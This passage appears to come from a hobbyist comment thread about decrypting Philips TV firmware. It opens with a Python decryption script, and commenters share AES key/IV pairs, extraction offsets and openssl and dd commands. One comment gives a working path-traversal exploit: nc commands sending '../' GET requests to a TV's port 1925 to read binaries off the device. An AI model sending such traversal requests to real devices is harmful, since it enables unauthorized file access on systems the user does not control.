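# last four ciphertext bytes of its ixml block (sample data for the tail XOR).
KEY_47PFL5007G = bytes.fromhex("47fbf8cad62bb95af3ad9509e5c2175d")
IV_47PFL5007G = bytes.fromhex("63120fb321b0410f216d6dc2d8641a11")
IXML_TAIL_FROM_THREAD = bytes.fromhex("67dbd8ea")


def derive_key_iv(key_file: bytes, iv_file: bytes):
    """The TV uses the MD5 digests of the key and IV files as AES-128 key and IV."""
    return hashlib.md5(key_file).digest(), hashlib.md5(iv_file).digest()


def aes128_cbc_decrypt_openssl(data: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-128-CBC, no padding, via the openssl CLI; len(data) must be a multiple of 16."""
    cmd = ["openssl", "enc", "-d", "-aes-128-cbc", "-nopad", "-K", key.hex(), "-iv", iv.hex()]
    return subprocess.run(cmd, input=data, capture_output=True, check=True).stdout


def split_tail(enc: bytes):
    """Aligned ciphertext for AES, plus the 0..15 leftover bytes."""
    full = len(enc) - len(enc) % 16
    return enc[:full], enc[full:]


def decrypt_tail(tail: bytes, key: bytes) -> bytes:
    """Leftover bytes are plaintext XOR key[0:len(tail)] (the MD5-derived key, not the key file)."""
    return bytes(c ^ k for c, k in zip(tail, key))


def strip_headers(plain: bytes):
    """Remove the 48-byte header, then the 4 KiB NFSB header if the data starts with 'NFSB'.
    Returns (image, had_nfsb)."""
    body = plain[PLAIN_HEADER:]
    if body.startswith(b"NFSB"):
        return body[NFSB_HEADER:], True
    return body, False


def is_squashfs(image: bytes) -> bool:
    """unsquashfs / the loop mount expect the little-endian squashfs magic up front."""
    return image.startswith(SQUASHFS_MAGIC)


def decrypt_block(enc: bytes, key: bytes, iv: bytes, cbc=aes128_cbc_decrypt_openssl):
    """Full decryption of one extracted block (the bytes dd produced: 48-byte header + payload).
    Returns (image, had_nfsb, looks_like_squashfs)."""
    aligned, tail = split_tail(enc)
    plain = cbc(aligned, key, iv) + decrypt_tail(tail, key)
    image, had_nfsb = strip_headers(plain)
    return image, had_nfsb, is_squashfs(image)


if __name__ == "__main__":
    import sys  # usage: python3 upgdec.py root.enc <key hex> <iv hex> > rootfs.img
    with open(sys.argv[1], "rb") as f:
        key, iv = bytes.fromhex(sys.argv[2]), bytes.fromhex(sys.argv[3])
        image, had_nfsb, squash = decrypt_block(f.read(), key, iv)
    sys.stdout.buffer.write(image)
    print(f"nfsb_header={had_nfsb} squashfs_magic={squash}", file=sys.stderr)
```

For firmware that uses the other key pair reported later in this thread (TPV_TPV_TPV_TPV_ with an all-zero IV), pass those bytes to `decrypt_block` directly instead of MD5 digests; `derive_key_iv` only applies to the key-file variant.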

  86. Thomas
    Thomas April 14, 2014 at 20:46 . Reply

    Thanks for your reply! That one has to use the md5sum instead of the plain AES key is logical now that I think again about how decryption works. I could have figured that out myself.

    I will publish my decryption script when it is done. I am quite busy now, so it may take a while.

    Many thanks also for posting the keys.

  87. Sebastian
    Sebastian April 21, 2014 at 19:19 . Reply

    Up-to-date firmware closed the injection on the 8008s series…. – don’t update!

  88. Sebastian
    Sebastian April 22, 2014 at 13:14 . Reply

    Before I upgraded my 8008s I downloaded some files like
    the 2 files at /mnt/jffs1/rw/interactive/flash/keystore
    -cacerts
    -basKeystore.jks
    Maybe it’s possible with these files?

    Additionally there is dropbear installed and running but blocked via iptables.

  89. kksnyk
    kksnyk May 2, 2014 at 13:29 . Reply

    Hi all,

    I wrote a little Windows application that can decompress the MTK bootloader used in Philips TV sets (and some others too).
    The compression method is called LZHS, probably some of you have already found some references to it in firmwares. It is based on LZSS and static Huffman coding, but first the file is preprocessed using a method named “ARMThumb_convert”. I found the LZHS encoder ELF file in a Philips open source package, so I started to inspect its outputs for several input files. After two weeks of research I’ve finished my app, and its output is exactly the same as the file that had been compressed using lzhsenc under Linux.
    If someone’s interested, I can give a link to the app (it requires MS.NET 4.0).

    Best regards,
    Kksnyk

  90. Sébastien Teka
    Sébastien Teka May 5, 2014 at 09:01 . Reply

    Maybe this helps (works on pfl6877h):

    * upgrade application:
    echo -e 'GET /../../../../../philips/apps/upgApp HTTP/1.0\n\n' | nc 192.168.0.3 1925

    * dependency:
    echo -e 'GET /../../../../../philips/lib/libecddatalib.so HTTP/1.0\n\n' | nc 192.168.0.3 1925

    The whole filesystem is mounted via NFS.

  91. zeewox
    zeewox May 14, 2014 at 08:41 . Reply

    Hi kksnyk,
    I’m interested by your tool.
    Is source code available somewhere on github or ggcode?

    Thank you.

  92. zeewox
    zeewox May 16, 2014 at 15:31 . Reply

    a tool to unpack Philips firmware on Fusion platform (upg file): https://github.com/frederic/pflupg-tool

  93. kksnyk
    kksnyk May 18, 2014 at 17:56 . Reply

    I downloaded several firmwares, and I’ve noticed that the first 0x30 bytes of all encrypted blocks are the same in most of the firmwares. Doing some XORs at the end of the blocks which are not multiples of 16 bytes, I finally got the key. It’s so simple (TPV_TPV_TPV_TPV_) that I didn’t have to think much to guess the IV.

    Key: 5450565F5450565F5450565F5450565F
    IV: 00000000000000000000000000000000

    The decrypted file is always correct. You can try it on PFL3107h for example, but this works on much more models.

    1. Luis D
      Luis D May 18, 2014 at 18:42 . Reply

      Be careful with the updates, the latest one for my TV (42PFL7007) fixes the issue/exploit

      kksnyk, what are the steps you follow to decrypt the firmware?

      Since I’m too much of a noob for all this, can you answer me: with all the info you got so far, can we create our own software?

  94. kksnyk
    kksnyk May 18, 2014 at 19:15 . Reply

    Like Brandy wrote earlier, you have to run openssl:

    openssl enc -d -aes128 -in encrypted_file.bin -out decrypted_file.bin -K 5450565F5450565F5450565F5450565F -iv 00000000000000000000000000000000

    You can find tags in the firmware such as “kern”, “root” etc, you have to extract them first. If I have more time, I’ll make an app for this purpose.
    However, creating our own firmware is not possible because we don’t have TPVision’s private key to sign it, so this project is a waste of time. I was simply interested in the contents of a Philips firmware.

    1. Luis D
      Luis D May 18, 2014 at 21:08 . Reply

      Thanks again kksnyk, my only hope was to find out which webcam the TV likes, since the original is very expensive… :( some time ago I found some USB IDs, but was not able to trace the makers nor any commercial model

      last question, when you extract the images on one step you say:

      There we are. The offset is 99079517 and the length is 0x03579000 (56070144).
      > dd if=Autorun.upg of=tmp1.bin bs=99079529 skip=1
      > dd if=tmp1.bin of=tmp2.bin bs=56070192 count=1


      Where do you get the 56070192 from? I just used your number and it worked, but I’m not sure it’s the right one

  95. zeewox
    zeewox May 18, 2014 at 21:27 . Reply

    Hi,

    @kksnyk I’m interested by your tool. Will you release the source code ?

    Here is a tool to unpack Philips firmware on Fusion platform (upg file):

    https://github.com/frederic/pflupg-tool

  96. kksnyk
    kksnyk May 18, 2014 at 21:48 . Reply

    That’s just the decimal form of the length (file size). To get it, for example go to the tag “root”, after that there are 4 bytes which you should skip and the following 4 bytes are the length. It’s little endian, so it must be read backwards.

    You’ll see something like this, in this case the length will be 0x78563412 and not 0x12345678:

    72 6F 6F 74 01 00 00 00 12 34 56 78 | root…..4Vx

    If you tell me the model no. of your TV, I can find out the offset and length of the root image within the UPG file.

    1. Luis D
      Luis D May 18, 2014 at 22:50 . Reply

      thank you!
      its a 42FPL7007
      the URL is: http://www.philips.com.ar/c/television/7000-series-dtvi-easy-3d-de-107-cm-42-pulgadas-42pfl7007g_77/prd/?t=support
      but the latest version online is the one with the fixes

  97. kksnyk
    kksnyk May 19, 2014 at 00:33 . Reply

    Your rootfs image starts at the offset 0x2170D8 (decimal: 2191576), and it’s 0x2852000 (decimal: 42278912) bytes long. To decrypt it, use the following key and IV.

    Key: 47fbf8cad62bb95af3ad9509e5c2175d
    IV: 63120fb321b0410f216d6dc2d8641a11

    The decrypted image has a 48-byte header that you have to delete in order to be able to mount it properly.

  98. kksnyk
    kksnyk May 19, 2014 at 00:38 . Reply

    Oh, I forgot to add 48 bytes to the length. So the correct length is 0x2852030 (42278960).

  99. Luis D
    Luis D May 19, 2014 at 00:40 . Reply

    thank you very much!

  100. kksnyk
    kksnyk May 19, 2014 at 12:34 . Reply

    You’re welcome. This image has another 4KB header, so you have to strip that off too.
    The mountable squashfs image should start with the bytes “hsqs”.

  101. mrGong
    mrGong May 24, 2014 at 19:09 . Reply

    Can anyone give me a link for downloading the old firmware of the pfl8008 2013 series?
    The decrypted one would be better. I would like to know which CEC lib they are using.

  102. stephan
    stephan June 3, 2014 at 13:59 . Reply

    Hi, could you also tell me how to decrypt the following image:
    http://www.p4c.philips.com/cgi-bin/dcbint/cpindex.pl?ctn=47PFK7109/12&slg=DE&scy=DE

    I wasn’t able to use just:
    key 5450565F5450565F5450565F5450565F
    iv 00000000000000000000000000000000

    Thanks Stephan

  103. milankowww
    milankowww June 9, 2014 at 23:15 . Reply

    Hello, I have a 47PFL7606K/02 with firmware Q5551-0.14.99.0. The path vulnerability does not exist here. Just to save some time: 1) have you tried http://www.cvedetails.com/cve/CVE-2011-2716/ ? 2) If not, could you please dump the busybox binary for me, so I know what commands I can use? Milan

  104. kksnyk
    kksnyk June 12, 2014 at 20:34 . Reply

    @milankowww: Firmwares starting with Q cannot be extracted or decrypted with our known methods. The structure of these UPG files is very different. Same for 8008s.

    @stephan: The decryption key and iv for your firmware is not yet known. The key-iv pairs we know so far:

    Key1: 5450565F5450565F5450565F5450565F
    IV1: 00000000000000000000000000000000

    Key2: 47FBF8CAD62BB95AF3AD9509E5C2175D
    IV2: 63120FB321B0410F216D6DC2D8641A11

    Key3: D378EAF81D378A801B556985789A7C31
    IV3: 73079FD19183715E130858588479C652

    You don’t have to try any of these, they won’t work in your case. But for others, they can be useful.

  105. John
    John June 13, 2014 at 11:47 . Reply

    I have found a complete NAND flash dump of a 37PFL9632D. You can download it from http://fa.metincom.net/dumps/3788_37PFL9632D.part.rar and http://fa.metincom.net/dumps/3789_37PFL9632D.part.rar. Rename 3788_37PFL9632D.part.rar to 37PFL9632D.part1.rar and 3789_37PFL9632D.part.rar to 37PFL9632D.part2.rar in order to extract the archive.

    The 37PFL9632D has the same firmware image format as the PFL9703 or my PFL5007. Maybe we can learn from the dump how to decrypt the firmware image.

    Here is the binwalk output for the dump:

    DECIMAL       HEX          DESCRIPTION
    -------------------------------------------------------------------------------------------------------------
    15900         0x3E1C       YAFFS filesystem
    15984         0x3E70       YAFFS filesystem
    16068         0x3EC4       YAFFS filesystem
    16828         0x41BC       Squashfs filesystem, little endian, version 3.0, size: 4764847932560113663 bytes, 213 inodes, blocksize: -53658112 bytes, created: Wed Aug 1 15:35:30 2007
    9446988       0x90264C     Copyright string: " (c) 2004 by Koninklijke Philips Electronics N.V. DemuxMpegPS s Electronics N.V. DemuxMpegPS 1.2.36737"
    9449836       0x90316C     Copyright string: " (c) 2005 by Koninklijke Philips Electronics N.V. VdecJpeg 1.1s Electronics N.V. VdecJpeg 1.10.47483"
    9601232       0x9280D0     LZMA compressed data, properties: 0x40, dictionary size: 16777216 bytes, uncompressed size: 117440512 bytes
    9635872       0x930820     LZMA compressed data, properties: 0x5B, dictionary size: 33554432 bytes, uncompressed size: 805306368 bytes
    9636604       0x930AFC     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 402653184 bytes
    9636884       0x930C14     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 50331648 bytes
    9637024       0x930CA0     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 50331648 bytes
    9637460       0x930E54     LZMA compressed data, properties: 0x65, dictionary size: 16777216 bytes, uncompressed size: 134217728 bytes
    9637616       0x930EF0     LZMA compressed data, properties: 0x66, dictionary size: 16777216 bytes, uncompressed size: 134217728 bytes
    9639624       0x9316C8     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 905969664 bytes
    9639780       0x931764     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 905969664 bytes
    9639920       0x9317F0     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 452984832 bytes
    9640060       0x93187C     LZMA compressed data, properties: 0xC8, dictionary size: 33554432 bytes, uncompressed size: 218103808 bytes
    9681951       0x93BC1F     mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
    11904743      0xB5A6E7     mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 4bit
    13044084      0xC70974     Squashfs filesystem, little endian, version 3.0, size: 1387555 bytes, 211 inodes, blocksize: 65536 bytes, created: Fri Oct 5 11:04:08 2007
    18501120      0x11A4E00    Squashfs filesystem, little endian, version 3.0, size: 7222013 bytes, 253 inodes, blocksize: 65536 bytes, created: Fri Oct 5 11:04:39 2007
    29947532      0x1C8F68C    JFFS2 filesystem, little endian
    38320017      0x248B791    mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
    38455296      0x24AC800    JFFS2 filesystem, little endian

    Unfortunately Philips seems to use a non-standard Squashfs filesystem.

  106. Luis
    Luis June 13, 2014 at 19:45 . Reply

    What I was wondering is if we could extract and use the Netflix bins on another ARM device….

  107. Henry
    Henry June 22, 2014 at 20:42 . Reply

    Hey, I have a 32PFL7685/12 and a stripy screen (vertical). This happened after moving the TV. It may have got some physical kicks but it’s not likely.
    I get the sound with a DVD player connected, but the screen remains striped, as it was from the start when I plugged in the TV. All connections tried, there’s no way that it is because of the cable etc. It starts after powering on and even the Philips logo doesn’t show.

    Somebody told me that there is a possibility to fix it with a factory reset.
    But I can’t use any menu, because I simply can’t see it. Is there a way to do it with the remote?
    Is 062596 the right way? If yes then how to move on? Any ideas?

  108. kksnyk
    kksnyk August 27, 2014 at 15:45 . Reply

    @zeewox: sorry for replying so late, I’ve just noticed your comments. I’ll upload the application and its source code today or tomorrow, when I can access my PC.

  109. essir
    essir September 22, 2014 at 08:16 . Reply

    Hi,
    I have a Philips 37PFL9642D/19 since 2007.
    This LCD is part of the TV520 series, designed by NXP, a Philips subsidiary.
    I have followed this post since its creation in 2010, but it is true that there has been a little more excitement since last year.
    I will pass on the files I could recover and hope that everyone will have a custom firmware shortly for their TV.

    TV520 architecture => ELCEurope2007Presentations.pdf
    http://zz1z5226yt.1fichier.com/

    TV520 – Q528.1E [Engineering & Service Training] => Philips-q528e-Service-Training-Manual-Part2.pdf
    http://3l8dta5ith.1fichier.com/

    Q528.1E LA [Service Manual] => Philips-Q528-1ELA-chassis.pdf
    http://bylisf76eu.1fichier.com/

    ComPair => Philips-ComPair-training-20January-2008.pdf
    http://rgiwztyejw.1fichier.com/

  110. essir
    essir September 22, 2014 at 08:50 . Reply

    I found one on a server, firmware for 42PFL9603D/10 decrypted.
    Firmware version is Q591E_v1.101.0.0

    The files contained in autorun.upg are:
    => 3104 337 06531_bootPromPNX5100_Q591E_0.9.0.1.zip
    => Point2PointDLL : 3104 337 06531_Ceisp2padll_P2PAD_3.1.0.0.zip
    => 3104 337 06531_DDC_Q591E_0.2.0.0.zip
    => EDID : 3104 337 06531_EDID_Q591E_0.5.0.0.zip
    => ConsumerMainSoftware : 3104 337 06531_FUS_Q591E_0.101.0.0.zip
    => NVM : 3104 337 06531_processNVM_Q591E_0.6.3.0.zip
    => StandbySoftware : 3104 337 06531_StandbySW_CFT55_44.0.0.0.zip

    Q591E_v1.101.0.0.7z
    http://673c0mdas4.1fichier.com/
